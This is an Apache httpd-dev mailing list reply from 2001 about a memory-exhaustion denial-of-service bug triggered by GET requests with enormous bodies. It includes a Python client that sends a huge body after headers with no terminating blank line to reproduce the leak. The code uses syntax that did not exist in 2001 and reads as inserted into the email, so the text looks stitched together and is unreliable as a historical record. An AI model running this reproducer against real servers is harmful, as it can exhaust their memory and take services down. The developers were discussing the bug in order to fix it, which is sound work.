httpd-dev mailing list archives

From Aaron Bannert <>
Subject Re: More DoS -- Large GETs
Date Wed, 31 Oct 2001 01:55:42 GMT
On Tue, Oct 30, 2001 at 03:48:48PM -0800, Jon Travis wrote:
> On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> > Jon Travis <> writes:
> > 
> > > It's possible to make Apache eat up all available memory on a system
> > > by sending a GET with a large Content-Length (like several hundred MB),
> > > and then sending that content.  This is as of HEAD about 5 minutes ago.
> > 
> > Maybe the problem is your client implementation?  You didn't by any
> > chance get a mongo buffer to hold the request body did you?
> > 
> > I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> > 
> > strace showed that server process was pulling in 8K at a time...  lots
> > of CPU between client and server but no swap fest.
> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.

I am unable to reproduce this with valid HTTP request syntax and
arbitrarily large bodies (at least against /index.html.en). The server's
memory grows only up to an apparent limit.

However, if I omit the extra CRLF at the end of the headers (effectively
fusing this humongous body with the headers) I _DO_ see a massive
memory leak.
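The two cases differ only in whether the blank line that terminates the
header block is sent. A minimal sketch of a client that can exercise both
(this is an illustration, not the original test program; the host, port,
path, and function names here are my own placeholders):

```python
import socket

def build_request(path="/index.html.en", host="localhost",
                  length=100 * 1024 * 1024, terminate_headers=True):
    """Build the raw bytes of a GET carrying a large Content-Length."""
    req = (f"GET {path} HTTP/1.1\r\n"
           f"Host: {host}\r\n"
           f"Content-Length: {length}\r\n")
    if terminate_headers:
        req += "\r\n"  # blank line ending the header block (valid HTTP)
    # Without that blank line, the body bytes that follow are still
    # being parsed as header data by the server.
    return req.encode("ascii")

def send_large_get(host, port, length=100 * 1024 * 1024,
                   terminate_headers=True):
    """Stream `length` bytes of 'x' after the (possibly unterminated)
    headers, as in the 1 MB-buffer test described above."""
    with socket.create_connection((host, port)) as sock:
        sock.sendall(build_request(host=host, length=length,
                                   terminate_headers=terminate_headers))
        chunk = b"x" * (1024 * 1024)  # 1 MB of 'x's
        for _ in range(length // len(chunk)):
            sock.sendall(chunk)
```

Calling send_large_get() with terminate_headers=True corresponds to the
well-behaved case; terminate_headers=False reproduces the fused
headers-plus-body request that triggers the leak for me.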

Email me privately if you'd like the test client program I whipped together.
